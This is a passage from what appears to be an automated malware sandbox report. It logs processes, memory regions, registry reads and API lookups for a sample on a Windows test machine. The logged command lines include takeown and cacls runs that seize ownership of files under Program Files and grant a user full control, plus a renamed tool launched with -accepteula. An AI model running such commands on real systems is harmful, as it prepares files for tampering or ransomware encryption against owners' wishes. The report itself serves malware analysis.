1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "PDIALOG.exe" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "PDIALOG.exe" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #124: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #124 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c G13k6QZj.exe -accepteula "Seyes.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:36, Reason: Child Process |
| Unmonitor | End Time: 00:02:49, Reason: Self Terminated |
| Monitor Duration | 00:00:13 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x67c |
| Parent PID | 0xa64 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
93C
0x
DC8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000580000 | 0x00580000 | 0x0059ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000580000 | 0x00580000 | 0x0058ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x00593fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005a0000 | 0x005a0000 | 0x005a1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005a0000 | 0x005a0000 | 0x005a3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005b0000 | 0x005b0000 | 0x005c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x0070ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000710000 | 0x00710000 | 0x00713fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x00720fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000730000 | 0x00730000 | 0x00731fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000740000 | 0x00740000 | 0x0083ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000840000 | 0x00840000 | 0x0087ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008c0000 | 0x008c0000 | 0x008cffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| locale.nls | 0x04980000 | 0x04a3dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004a40000 | 0x04a40000 | 0x04b3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b40000 | 0x04b40000 | 0x04cbffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04cc0000 | 0x04ff6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007eb00000 | 0x7eb00000 | 0x7ebfffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ec00000 | 0x7ec00000 | 0x7ec22fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ec26000 | 0x7ec26000 | 0x7ec26fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ec27000 | 0x7ec27000 | 0x7ec29fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ec2a000 | 0x7ec2a000 | 0x7ec2afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ec2d000 | 0x7ec2d000 | 0x7ec2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 168, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0x2c0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #125: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #125 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:37, Reason: Child Process |
| Unmonitor | End Time: 00:02:43, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x2ec |
| Parent PID | 0xac8 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A28
0x
2D8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00210000 | 0x0021ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000ea0000 | 0x00ea0000 | 0x04e9ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004ea0000 | 0x04ea0000 | 0x04ebffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ea0000 | 0x04ea0000 | 0x04eaffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004eb0000 | 0x04eb0000 | 0x04eb3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ec0000 | 0x04ec0000 | 0x04ec1fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x04ec0000 | 0x04ec4fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004ed0000 | 0x04ed0000 | 0x04ee3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004ef0000 | 0x04ef0000 | 0x04f2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f30000 | 0x04f30000 | 0x04f6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004f70000 | 0x04f70000 | 0x04f73fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004f80000 | 0x04f80000 | 0x04f80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004f90000 | 0x04f90000 | 0x04f91fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04fa0000 | 0x0505dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005060000 | 0x05060000 | 0x05060fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005070000 | 0x05070000 | 0x0507ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005080000 | 0x05080000 | 0x0536ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005080000 | 0x05080000 | 0x050bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000050c0000 | 0x050c0000 | 0x050fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005100000 | 0x05100000 | 0x0514ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x05100000 | 0x05129fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005100000 | 0x05100000 | 0x05100fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005140000 | 0x05140000 | 0x0514ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005270000 | 0x05270000 | 0x0536ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005370000 | 0x05370000 | 0x054f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005500000 | 0x05500000 | 0x05680fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005690000 | 0x05690000 | 0x06a8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x06a90000 | 0x06dc6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74710000 | 0x74737fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ea50000 | 0x7ea50000 | 0x7eb4ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007eb50000 | 0x7eb50000 | 0x7eb72fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eb76000 | 0x7eb76000 | 0x7eb78fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb79000 | 0x7eb79000 | 0x7eb7bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb7c000 | 0x7eb7c000 | 0x7eb7cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb7f000 | 0x7eb7f000 | 0x7eb7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #126: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #126 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:37, Reason: Child Process |
| Unmonitor | End Time: 00:02:44, Reason: Self Terminated |
| Monitor Duration | 00:00:07 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd7c |
| Parent PID | 0x858 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
884
0x
83C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00210000 | 0x0021ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000500000 | 0x00500000 | 0x044fffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004500000 | 0x04500000 | 0x0451ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004500000 | 0x04500000 | 0x0450ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004510000 | 0x04510000 | 0x04513fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004520000 | 0x04520000 | 0x04521fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x04520000 | 0x04524fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004530000 | 0x04530000 | 0x04543fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004550000 | 0x04550000 | 0x0458ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004590000 | 0x04590000 | 0x045cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000045d0000 | 0x045d0000 | 0x045d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000045e0000 | 0x045e0000 | 0x045e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000045f0000 | 0x045f0000 | 0x045f1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04600000 | 0x046bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000046c0000 | 0x046c0000 | 0x046fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004700000 | 0x04700000 | 0x0473ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004740000 | 0x04740000 | 0x04740fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004750000 | 0x04750000 | 0x04750fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004760000 | 0x04760000 | 0x0476ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004770000 | 0x04770000 | 0x0499ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004770000 | 0x04770000 | 0x047affff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x04770000 | 0x04799fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000047a0000 | 0x047a0000 | 0x047affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000048a0000 | 0x048a0000 | 0x0499ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000049a0000 | 0x049a0000 | 0x04b27fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004b30000 | 0x04b30000 | 0x04cb0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004cc0000 | 0x04cc0000 | 0x060bffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x060c0000 | 0x063f6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74710000 | 0x74737fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ea70000 | 0x7ea70000 | 0x7eb6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007eb70000 | 0x7eb70000 | 0x7eb92fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eb96000 | 0x7eb96000 | 0x7eb96fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb99000 | 0x7eb99000 | 0x7eb9bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb9c000 | 0x7eb9c000 | 0x7eb9efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb9f000 | 0x7eb9f000 | 0x7eb9ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #127: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #127 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\Templates\Music.jtp" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:38, Reason: Child Process |
| Unmonitor | End Time: 00:02:46, Reason: Self Terminated |
| Monitor Duration | 00:00:08 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x570 |
| Parent PID | 0x744 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E74
0x
2DC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00830000 | 0x00839fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000a90000 | 0x00a90000 | 0x04a8ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004a90000 | 0x04a90000 | 0x04aaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a90000 | 0x04a90000 | 0x04a9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004aa0000 | 0x04aa0000 | 0x04aa3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ab0000 | 0x04ab0000 | 0x04ab1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ab0000 | 0x04ab0000 | 0x04ab3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ac0000 | 0x04ac0000 | 0x04ad3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004ae0000 | 0x04ae0000 | 0x04b1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b20000 | 0x04b20000 | 0x04b5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b60000 | 0x04b60000 | 0x04b63fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004b70000 | 0x04b70000 | 0x04b70fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004b80000 | 0x04b80000 | 0x04b81fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04b90000 | 0x04c4dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004c50000 | 0x04c50000 | 0x04c8ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x04c90000 | 0x04c91fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004cc0000 | 0x04cc0000 | 0x04ccffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004cd0000 | 0x04cd0000 | 0x04e4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004cd0000 | 0x04cd0000 | 0x04d0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d50000 | 0x04d50000 | 0x04e4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e50000 | 0x04e50000 | 0x04feffff | Private Memory | rw |
|
|
|
- |
